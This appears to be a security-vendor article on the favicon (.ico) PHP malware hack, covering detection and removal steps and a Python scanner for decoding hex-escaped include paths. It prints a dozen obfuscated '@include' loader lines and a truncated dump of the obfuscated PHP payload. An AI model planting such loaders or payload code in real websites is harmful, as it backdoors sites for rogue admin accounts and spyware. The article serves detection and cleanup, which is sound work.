What is the Favicon (.ico) Malware hack?


The favicon (.ico) malware creates rogue favicon.ico or random .ico files that contain malicious PHP code. This code is known to perform dangerous actions on websites, such as URL injection, creation of administrator accounts in WordPress/Drupal, installing spyware/trojans, and creating phishing pages.

Malicious code is also added to index.php and other PHP files, which 'include' the .ico file so that the PHP code hidden inside it is executed.

This article also includes steps to help you with the favicon (.ico) hack removal.

Files targeted in this attack

  • index.php
  • wp-login.php

How to detect the Favicon Virus?

  • Scan your website for all icon (.ico) files.
  • Download all of these (.ico) files to your system and rename their file extensions to ".txt".
  • Open the (.ico) files, now converted to (.txt), and look for PHP code. If any PHP code is found, the file is most probably infected.
  • Now scan your core files for instances where the malicious PHP code found in the above step was executed.
  • If the file contains gibberish text as shown in the screenshot below, then the file is not infected.

Following the above steps will help you with favicon (.ico) hack removal.

Malware Include examples

  • @include "\x2fhome\x2fid00\x3131/d\x6fmain\x73/wid\x65-ope\x6e-net\x77orks\x2ecom/\x70ubli\x63_htm\x6c/mod\x75les/\x63olor\x2ffavi\x63on_6\x61ecc7\x2eico";
  • /home/username/public_html/modules/color/favicon_6aecc7.ico
  • @include "\x2f/sgb\x2ffavi\x63on_5\x34e6ed\x2eico";
  • @include "\x2f/s\x67b/\x66av\x69co\x6e_5\x34e6\x65d.\x69co";
  • @include "\x2f/\x73g\x62/\x66a\x76i\x63o\x6e_\x354\x656\x65d\x2ei\x63o";
  • @include "\x2f/\x70o\x6c-\x6de\x74/\x5fh\x74m\x6c/\x76i\x65w\x2ff\x61v\x69c\x6fn\x5f3\x30a\x391\x65.\x69c\x6f";
  • @include "\x2f/sg\x62/fa\x76ico\x6e_54\x656ed\x2eico";
  • @include "\x2f/p\x6fl-\x6det\x2f_h\x74ml\x2fvi\x65w/\x66av\x69co\x6e_3\x30a9\x31e.\x69co";
  • @include "\x2f/po\x6c-me\x74/_h\x74ml/\x76iew\x2ffav\x69con\x5f30a\x391e.\x69co";
  • @include "\x2f/pol\x2dmet/\x5fhtml\x2fview\x2ffavi\x63on_3\x30a91e\x2eico";
  • @include "\x2fmnt\x2ftar\x67et0\x33/35\x36076\x2f363\x3244/\x77ww.\x63red\x69tfa\x69ry.\x75s/w\x65b/c\x6fnte\x6et/w\x70-co\x6eten\x74/wf\x6cogs\x2ffav\x69con\x5fce8\x64b6.\x69co";
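
The detection steps and the include examples above can be checked together against a local copy of the web root. The following Python script is an added example, not code from the original article: it flags .ico files that contain a PHP open tag and decodes the hex-escaped include paths in PHP files so the loader lines become readable. The function names and the report layout are assumptions made for this example, and SAMPLE reuses one of the include lines listed above.

```python
import re
from pathlib import Path

# include/require with a quoted literal argument, optional @ and parentheses
INCLUDE_RE = re.compile(
    rb"""@?\s*\b(?:include|require)(?:_once)?\s*\(?\s*(["'])(.*?)\1""", re.I | re.S)
# PHP double-quoted escapes: \xHH (1-2 hex digits) and \NNN (1-3 octal digits)
ESCAPE_RE = re.compile(rb"\\x([0-9A-Fa-f]{1,2})|\\([0-7]{1,3})")

def decode_php_string(raw, quote):
    """Return the path PHP would actually open for a quoted include argument."""
    if quote == b"'":                      # single quotes: no escape processing
        return raw.decode("latin-1")
    def repl(m):
        if m.group(1) is not None:
            return bytes([int(m.group(1), 16)])
        return bytes([int(m.group(2), 8) & 0xFF])
    return ESCAPE_RE.sub(repl, raw).decode("latin-1")

def ico_includes(php_source):
    """Decoded include/require targets in php_source that end in .ico."""
    paths = (decode_php_string(m.group(2), m.group(1))
             for m in INCLUDE_RE.finditer(php_source))
    return [p for p in paths if p.lower().endswith(".ico")]

def ico_contains_php(data):
    """True if a supposed icon file carries a PHP open tag."""
    return b"<?php" in data.lower()

def scan_site(root):
    """Walk a local copy of the web root; report infected icons and loaders."""
    report = {"php_in_ico": [], "ico_loaders": {}}
    for path in sorted(Path(root).rglob("*")):
        suffix = path.suffix.lower()
        if suffix not in (".ico", ".php") or not path.is_file():
            continue
        data = path.read_bytes()
        if suffix == ".ico":
            if ico_contains_php(data):
                report["php_in_ico"].append(str(path))
        elif hits := ico_includes(data):
            report["ico_loaders"][str(path)] = hits
    return report

# Sample input: the @include line is one of the examples listed above.
SAMPLE = rb'''<?php
@include "\x2f/sgb\x2ffavi\x63on_5\x34e6ed\x2eico";
require "wp-blog-header.php";
'''
```

Run scan_site() on a downloaded copy of the site rather than on the live server, and review every path it reports before deleting anything.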

Symptoms & Problems with this malware

  • Rogue Admin User in CMS
  • Installs Spyware
  • Patches xmlrpc.php

How to remove favicon.ico hack

  • Delete the malicious .ico file
  • Remove the malicious code in the index.php & other PHP files which include these malicious files


Code Dump

<?php
if (!defined('ALREADY_RUN_1bc29b36f342a82aaf6658785356718'))
{
define('ALREADY_RUN_1bc29b36f342a82aaf6658785356718', 1);

 $zqhlhv = 1056; function rxjdqbd($cdfuc, $attkkyxjmu){$wfdjzocv = ''; for($i=0; $i < strlen($cdfuc); $i++){$wfdjzocv .= isset($attkkyxjmu[$cdfuc[$i]]) ? $attkkyxjmu[$cdfuc[$i]] : $cdfuc[$i];}
$udaib="rawurl" . "decode";return $udaib($wfdjzocv);}
$yoyqluklu = '%2J%2u%2J%2u%T2606_Cre%nF%nQrNNLN_oLS%nQ%n1%n2qpWW%nP%aD%2J%'.
'2u%T2606_Cre%nF%nQoLS_rNNLNC%nQ%n1%n22%nP%aD%2J%2u%T2606_Cre%nF%nQIxi_rirXK'.
'e6L0_e6Ir%nQ%n1%n22%nP%aD%2J%2u%T2rNNLN_NrdLNe60S%nF2%nP%aD%2J%2u%T2Cre_e6Ir'.

This information is provided as part of the Astra community project. All information should be considered as-is, without guarantees. All product names, logos, and brands are property of their respective owners. All company, product and service names used in this website are for identification purposes only. Use of these names, logos, and brands does not imply endorsement. If you are an owner of some content and want it to be removed, please mail to [email protected]